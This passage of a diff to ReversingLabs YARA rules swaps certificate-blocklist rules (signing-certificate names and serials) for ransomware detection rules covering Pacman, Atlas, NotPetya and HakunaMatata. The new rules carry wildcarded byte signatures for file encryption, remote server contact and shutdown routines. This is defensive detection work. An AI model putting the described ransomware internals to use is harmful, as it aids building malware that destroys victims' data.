and $find_files_v5_0_2 and $crypt_files_v5_0_3 and $set_url_parameters_v5_0_3 and $remote_connection_v5_0_3)) +} +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Pacman : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Pacman ransomware." author = "ReversingLabs" - id = "4b5abcfe-259e-5029-822b-c191b8d2c607" - date = "2023-11-08" - modified = "2023-11-08" + id = "a440769b-030b-5b72-a6f2-cf478dd7acd2" + date = "2021-08-12" + modified = "2021-08-12" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5616-L5634" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "665b280218528bbe3d5c65d043266469e5288587ed9d85d01797bef7ce132a6f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.Pacman.yara#L1-L68" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0634303a4db2631edb40a9435444f3bdc4bc6eb745c7e43a54478e54e7507403" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Pacman" + tc_detection_factor = 5 importance = 25 + strings: + $pacman_find_encrypted_1 = { + 28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 28 + 29 02 00 06 1F 1C 28 0E 04 00 06 [0-2] 7E 13 00 00 04 20 0F 03 00 00 28 2F 00 00 06 25 + 26 28 5D 02 00 06 [0-2] 28 6D 01 00 06 [0-2] 0B 07 13 06 16 13 05 2B 31 11 06 11 05 9A + 0C 28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] + 08 28 55 02 00 06 [0-2] 26 11 05 17 D6 13 05 11 05 11 06 8E B7 32 C7 1D 45 01 00 00 00 + F6 FF FF FF 17 2D 06 D0 1E 01 00 06 26 16 0A 38 BC 01 00 00 28 0A 00 00 06 [0-2] 6F 0D + 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04 00 06 [0-2] 14 20 + B0 0F 00 00 28 2F 00 00 06 [0-2] 1F 0A 8D 76 00 00 01 13 07 11 07 16 20 BF 0F 00 00 28 + 2F 00 00 06 [0-2] A2 11 07 17 20 C2 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 18 20 C5 0F + 00 00 28 2F 00 00 06 [0-2] A2 11 07 19 20 C8 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1A + 20 CB 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1B 20 CE 0F 00 00 28 2F 00 00 06 [0-2] A2 + } + $pacman_find_encrypted_2 = { + 11 07 1C 20 D1 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1D 20 D4 0F 00 00 28 2F 00 00 06 + [0-2] A2 11 07 1E 20 C2 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1F 09 20 D7 0F 00 00 28 + 2F 00 00 06 [0-2] A2 11 07 14 14 14 28 7A 04 00 06 [0-2] 28 E2 05 00 06 [0-2] 0D 28 07 + 00 00 06 28 1A 04 00 06 [0-2] 28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 + [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04 00 06 [0-2] 28 E2 05 00 06 [0-2] 28 36 05 00 06 + [0-2] 2C 78 1A 45 01 00 00 00 F6 FF FF FF 7E 16 00 00 04 28 9D 02 00 06 [0-2] 28 0A 00 + 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04 + 00 06 [0-2] 28 E2 05 00 06 [0-2] 09 16 28 23 01 00 06 28 0A 00 00 06 [0-2] 6F 0D 00 00 + 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04 00 06 [0-2] 28 E2 05 00 + 06 [0-2] 28 66 04 00 06 DE 0F 25 28 4E 04 00 06 13 04 28 02 03 00 06 DE 00 06 17 D6 0A + 06 28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] + 28 E2 04 00 06 [0-2] 3F 1B FE FF FF 1B 45 01 00 00 00 F6 FF FF FF 28 28 00 00 06 2A + } + $pacman_encrypt = { + 28 65 02 00 06 [0-2] 0A 16 13 05 20 00 04 00 00 13 07 06 11 07 28 2A 05 00 06 [0-2] 2C + 19 1C 45 01 00 00 00 F6 FF FF FF 17 2D 06 D0 20 01 00 06 26 11 07 13 05 2B 15 11 07 15 + D6 13 07 11 07 17 2F D0 17 45 01 00 00 00 F6 FF FF FF 20 DA 0F 00 00 28 2F 00 00 06 [0-2] + 11 05 28 9D 02 00 06 [0-2] 28 E2 02 00 06 [0-2] 28 6E 03 00 06 06 28 0A 03 00 06 [0-2] + 0B 14 13 04 14 0D 1F 0E 8D 25 00 00 01 13 0B 11 0B 16 ?? 9C 11 0B 17 ?? 9C 11 0B 18 + ?? 9C 11 0B 19 ?? 9C 11 0B 1A ?? 9C 11 0B 1B ?? 9C 11 0B 1C ?? 9C 11 0B 1D ?? 9C 11 0B + 1E 20 ?? ?? ?? ?? 9C 11 0B 1F 09 20 ?? ?? ?? ?? 9C 11 0B 1F 0A 20 ?? ?? ?? ?? 9C 11 0B + 1F 0B 1F ?? 9C 11 0B 1F 0C 1F ?? 9C 11 0B 1F 0D 1F ?? 9C 11 0B 13 06 02 11 06 11 05 07 + 12 04 12 03 28 1F 01 00 06 05 2C 18 18 45 01 00 00 00 F6 FF FF FF 06 11 04 09 28 96 03 + 00 06 [0-2] 0C 2B 0C 06 11 04 09 28 7E 05 00 06 [0-2] 0C 04 08 17 28 45 01 00 06 [0-2] + 13 08 20 01 04 00 00 8D 25 00 00 01 13 09 03 11 09 16 20 00 04 00 00 28 3A 03 00 06 [0-2] + 13 0A 11 0A 16 33 0C 1D 45 01 00 00 00 F6 FF FF FF DE 24 11 08 11 09 16 11 0A 28 F6 04 + 00 06 2B CF 11 08 2C 11 18 45 01 00 00 00 F6 FF FF FF 11 08 28 1E 03 00 06 DC DE 0C 28 + 4E 04 00 06 28 02 03 00 06 DE 00 08 28 1E 03 00 06 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SCABONE PTY LTD" and (pe.signatures[i].serial=="00:b5:14:e4:c5:30:9e:f9:f2:7a:dd:05:be:dd:43:39:a0" or pe.signatures[i].serial=="b5:14:e4:c5:30:9e:f9:f2:7a:dd:05:be:dd:43:39:a0") and 1572566400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($pacman_find_encrypted_1 and $pacman_find_encrypted_2 and $pacman_encrypt) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_13C7B92282Aae782Bfb00Baf879935F4 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Atlas : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Atlas ransomware." author = "ReversingLabs" - id = "cc147c06-e0cf-5536-be3c-17e838b346a9" - date = "2023-11-08" - modified = "2023-11-08" + id = "2c702b24-4b7e-505c-a694-0d915cc47315" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5636-L5652" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d4edbb446a51e5153ba88d6757d5fb610303eac3fd4bdd3b987b508dc618d2dc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Atlas.yara#L1-L99" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1486f931ec096a00d913de0568ddd8aa5a091256445bc28aba90e3e194ebd045" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Atlas" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files = { + 8B 74 24 ?? 8B 3D ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 52 56 FF D7 8B 94 24 ?? ?? ?? ?? 8D 44 24 ?? 8D 8C 24 ?? ?? ?? ?? 50 8B 84 24 ?? + ?? ?? ?? 51 52 50 E8 ?? ?? ?? ?? 8B 54 24 ?? 83 C4 ?? 8D 4C 24 ?? 8D 84 24 ?? ?? ?? + ?? 6A ?? 51 8B 4C 24 ?? 52 50 51 FF 15 ?? ?? ?? ?? 8D 54 24 ?? 6A ?? 52 55 53 56 FF + D7 8B 7C 24 ?? 33 C9 3B FD 89 4C 24 ?? 0F 85 ?? ?? ?? ?? EB ?? 8B 4C 24 ?? 33 F6 8A + 84 34 ?? ?? ?? ?? 02 C1 F6 E9 88 44 34 ?? 8A 84 34 ?? ?? ?? ?? 02 C1 F6 E9 88 44 34 + ?? 46 83 FE ?? 7C ?? 8B 74 24 ?? 57 56 8D 44 24 ?? 53 8D 8C 24 ?? ?? ?? ?? 50 51 E8 + ?? ?? ?? ?? 8B 54 24 ?? 8D 84 24 ?? ?? ?? ?? 52 53 56 8D 8C 24 ?? ?? ?? ?? 50 51 E8 + ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 83 C4 ?? 8D 54 24 ?? 6A ?? 52 50 53 51 FF 15 ?? + ?? ?? ?? 8B 44 24 ?? 8D 54 24 ?? 6A ?? 52 55 53 50 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B + 7C 24 ?? 41 3B FD 89 4C 24 ?? 0F 84 ?? ?? ?? ?? 8B 74 24 ?? 85 FF 74 ?? 8B 54 24 ?? + 8D 4C 24 ?? 6A ?? 51 57 53 52 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 44 24 + ?? 50 FF D6 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 53 FF D6 8B 4C 24 ?? 68 ?? ?? ?? + ?? 6A ?? 51 FF D6 5F 5E 5D 33 C0 5B 81 C4 ?? ?? ?? ?? C3 + } + $remote_server_1 = { + 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 33 C9 8D 94 24 ?? ?? ?? ?? 8A 0C 2E + 8D 84 24 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 46 81 FE ?? ?? + ?? ?? 7C ?? 8D 8C 24 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 52 E8 ?? ?? + ?? ?? 83 C4 ?? 33 F6 33 C0 8D 8C 24 ?? ?? ?? ?? 8A 04 1E 8D 94 24 ?? ?? ?? ?? 50 51 + 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 46 81 FE ?? ?? ?? ?? 7C ?? 8D 84 24 ?? ?? + ?? ?? 8D BC 24 ?? ?? ?? ?? 50 83 C9 ?? 33 C0 33 F6 F2 AE F7 D1 49 51 8D 8C 24 ?? ?? + ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 83 FE ?? + 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 46 FF 15 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 83 C9 ?? + 33 C0 8D 94 24 ?? ?? ?? ?? F2 AE F7 D1 49 52 8D 84 24 ?? ?? ?? ?? 51 50 68 ?? ?? ?? + ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? BE ?? ?? ?? ?? 8D 84 24 ?? ?? + ?? ?? 8A 10 8A 1E 8A CA 3A D3 75 ?? 84 C9 74 ?? 8A 50 ?? 8A 5E ?? 8A CA 3A D3 75 ?? + 83 C0 ?? 83 C6 ?? 84 C9 75 ?? 33 C0 EB + } + $remote_server_2 = { + 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 + ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 51 2B D8 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 52 03 D8 E8 ?? ?? ?? ?? 8B CB 8B F0 8B C1 83 C6 ?? 8D BC 24 ?? ?? ?? ?? 83 C4 + ?? C1 E9 ?? F3 A5 8B C8 68 ?? ?? ?? ?? 83 E1 ?? 68 ?? ?? ?? ?? F3 A4 8D 8C 24 ?? ?? + ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 94 24 ?? ?? ?? ?? BB + ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 2B D8 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? + ?? ?? ?? 03 D8 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B CB 8B F0 8B + D1 BF ?? ?? ?? ?? C1 E9 ?? F3 A5 83 C4 ?? 8B CA 83 E1 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 68 ?? ?? ?? ?? F3 A4 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? + BB ?? ?? ?? ?? 2B D8 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? + ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 03 D8 E8 ?? + ?? ?? ?? 8B CB 8B F0 8B C1 83 C6 ?? BF ?? ?? ?? ?? 68 ?? ?? ?? ?? C1 E9 ?? F3 A5 8B + C8 68 ?? ?? ?? ?? 83 E1 ?? F3 A4 E8 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 83 C9 ?? 33 C0 + 83 C4 ?? F2 AE F7 D1 49 83 F9 ?? 0F 82 ?? ?? ?? ?? 33 F6 8D BC 24 ?? ?? ?? ?? 8D 8C + 34 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 46 83 C7 ?? 81 FE ?? ?? + ?? ?? 72 ?? 8B 3D ?? ?? ?? ?? FF D7 8D 94 24 ?? ?? ?? ?? 56 52 8B E8 E8 ?? ?? ?? ?? + 83 C4 ?? FF D7 8B F0 8D 44 24 ?? 50 2B F5 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B + 4C 24 ?? 8D 94 24 ?? ?? ?? ?? 51 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? + 8D 84 24 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 50 83 C9 ?? 33 C0 F2 AE F7 D1 49 51 8D 8C + 24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 + } + $send_post_packet = { + 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 83 + FE ?? 89 75 ?? 75 ?? 50 E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B + 8B E5 5D C3 6A ?? 66 C7 45 ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 66 89 45 ?? 52 E8 ?? ?? + ?? ?? 89 45 ?? 8D 45 ?? 6A ?? 50 56 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 E8 ?? ?? ?? ?? + 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 8D BD ?? ?? ?? ?? 83 C9 ?? + 33 C0 6A ?? F2 AE F7 D1 49 51 8D 8D ?? ?? ?? ?? 51 56 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? + 56 E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 + } + $send_get_request = { + 68 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 83 + FB ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 5F 5E 5D 33 + C0 5B 81 C4 ?? ?? ?? ?? C3 6A ?? 66 C7 44 24 ?? ?? ?? E8 ?? ?? ?? ?? 8D 54 24 ?? 66 + 89 44 24 ?? 52 E8 ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 6A ?? 50 53 E8 ?? ?? ?? ?? 83 + F8 ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 5F 5E 5D 33 + C0 5B 81 C4 ?? ?? ?? ?? C3 8B FD 83 C9 ?? 33 C0 6A ?? F2 AE F7 D1 49 51 55 53 E8 ?? + ?? ?? ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? + 5F 5E 5D 33 C0 5B 81 C4 ?? ?? ?? ?? C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "THE WIZARD GIFT CORPORATION" and pe.signatures[i].serial=="13:c7:b9:22:82:aa:e7:82:bf:b0:0b:af:87:99:35:f4" and 1603130510<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $encrypt_files and $remote_server_1 and $remote_server_2 and $send_post_packet and $send_get_request } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_D627F1000D12485995514Bfbdefc55D9 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Notpetya : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects NotPetya ransomware." author = "ReversingLabs" - id = "4696fc12-16b7-575f-b90f-aa0a5cc12852" - date = "2023-11-08" - modified = "2023-11-08" + id = "ea655048-4ef7-5dd7-872e-f1c2e38234cf" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5654-L5672" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7ca590d71997879d17054a936238dd5273a52f3438d1b231a75927abfb118ffd" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.NotPetya.yara#L1-L73" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "328f0e527fee2145879ee13c003d375db832f7f3eacf7a1eb303393c1c8b5a36" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "NotPetya" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "THREE D CORPORATION PTY LTD" and (pe.signatures[i].serial=="00:d6:27:f1:00:0d:12:48:59:95:51:4b:fb:de:fc:55:d9" or pe.signatures[i].serial=="d6:27:f1:00:0d:12:48:59:95:51:4b:fb:de:fc:55:d9") and 1597622400<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_5Fb6Bae8834Edd8D3D58818Edc86D7D7 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "52b11933-f22c-53ea-88b7-75b3242907dd" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5674-L5690" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a8cec0479bfd53f34e291d56538187c05375e80d20af7f0af08f0db8e1d6ed22" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $encrypt_file = { + 8B EC 83 EC ?? 53 56 57 33 F6 56 56 6A ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? + ?? ?? 8B F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 89 + 75 ?? 39 75 ?? 7C ?? B8 ?? ?? ?? ?? 7F ?? 39 45 ?? 76 ?? 89 45 ?? 8B D8 56 53 56 6A + ?? 56 57 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 74 ?? FF 75 ?? 56 56 6A ?? 50 FF 15 ?? ?? + ?? ?? 8B F8 3B FE 74 ?? 53 8D 45 ?? 50 8B 45 ?? 57 56 FF 75 ?? 56 FF 70 ?? FF 15 ?? + ?? ?? ?? 85 C0 74 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? FF 75 ?? FF + 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B C9 C2 ?? ?? 8B 45 ?? 89 45 ?? C1 + E8 ?? 8D 58 ?? C7 45 ?? ?? ?? ?? ?? C1 E3 ?? E9 + } + $main = { + 55 8B EC 8B 45 ?? 53 56 8B 35 ?? ?? ?? ?? 57 BF ?? ?? ?? ?? 57 6A ?? BB ?? ?? ?? ?? + 53 83 C0 ?? 6A ?? 50 FF D6 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 57 6A + ?? 6A ?? EB ?? 3D ?? ?? ?? ?? 75 ?? 6A ?? 6A ?? 53 8B 45 ?? 6A ?? 83 C0 ?? 50 FF D6 + 85 C0 74 ?? 8B 75 ?? 8B C6 E8 ?? ?? ?? ?? 85 C0 74 ?? 56 6A ?? 56 E8 ?? ?? ?? ?? 56 + E8 ?? ?? ?? ?? FF 76 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 76 ?? FF 15 ?? ?? ?? ?? EB ?? 8B + 75 ?? 56 FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 5D C2 + } + $encryption_loop = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 83 7D ?? ?? 53 56 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? + ?? FF 75 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 + 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? + ?? ?? 8B 1D ?? ?? ?? ?? 8B 75 ?? 8B 46 ?? 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85 + C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 44 24 ?? 66 8B 10 + 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 + D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 44 24 + ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 + C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? + 50 FF 75 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 44 + 24 ?? ?? 74 ?? F7 44 24 ?? ?? ?? ?? ?? 75 ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? + FF D3 85 C0 75 ?? 8B 45 ?? 56 48 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? 8D + 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 8D 51 ?? 66 8B 31 83 C1 ?? 66 85 F6 75 ?? + 2B CA D1 F9 8D 4C 4C ?? 3B C1 74 ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 + ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3 85 C0 74 ?? FF 75 + ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? + ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5E 5B 8B E5 5D C2 + } + $shutdown = { + 68 ?? ?? ?? ?? 8B CA 8B D0 0F B7 45 ?? 03 C2 33 D2 F7 F6 0F B7 75 ?? 8D 85 ?? ?? ?? + ?? 50 03 F1 8B FA FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? F6 05 ?? ?? ?? + ?? ?? B8 ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? 56 57 8D 8D ?? ?? ?? ?? 51 50 8D 85 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 85 ?? ?? ?? ?? 50 56 57 + 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 85 ?? ?? + ?? ?? 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 5F 5E 8B C3 5B C9 C3 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Tramplink LLC" and pe.signatures[i].serial=="5f:b6:ba:e8:83:4e:dd:8d:3d:58:81:8e:dc:86:d7:d7" and 1600781989<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $encrypt_file and $main and $encryption_loop and $shutdown } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_E5Ad42C509A7C24605530D35832C091E : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Hakunamatata : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects HakunaMatata ransomware." author = "ReversingLabs" - id = "29b1803e-90ee-5390-9548-20b24a3de218" - date = "2023-11-08" - modified = "2023-11-08" + id = "17438fcd-7a51-5fb6-96ac-38523bc1744f" + date = "2020-11-11" + modified = "2020-11-11" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5692-L5710" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2d57d1c171734d0da167ce7eba47aecd88cd15063488d79659804c6c2fae00a2" + source_url = 